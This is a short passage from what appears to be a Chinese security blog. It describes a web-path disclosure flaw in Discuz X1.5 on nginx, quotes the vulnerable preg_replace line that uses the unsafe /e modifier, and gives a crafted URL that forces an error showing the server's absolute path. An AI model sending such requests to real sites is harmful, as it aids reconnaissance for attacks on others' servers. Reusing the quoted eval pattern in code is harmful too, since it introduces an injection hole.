页面载入中,请稍后...

现在位置 >首页 > 所有属于爆路径分类文章
Discuz 1.5暴WEB路径漏洞
测试环境:discuz X1.5+nginx 1.0 漏洞文件source/function/function_core.php, 代码: $_G['setting']['domain']['app']['default'] && $content = preg_replace(“/<a href=\”([^\"]+)\”/e”, “rewriteoutput(‘site_default’, 0, ‘”.$_G['setting']['domain']['app']['default'].$port.$_G['siteroot'].”‘, ‘\\1′)”, $content); 利用代码: http://www.tmdsb.com/forum.php/admin.php’/XXXXXXX.php 就可以在底部看到一个爆出绝对路径的错误了
阅读全文
不想听你唠叨×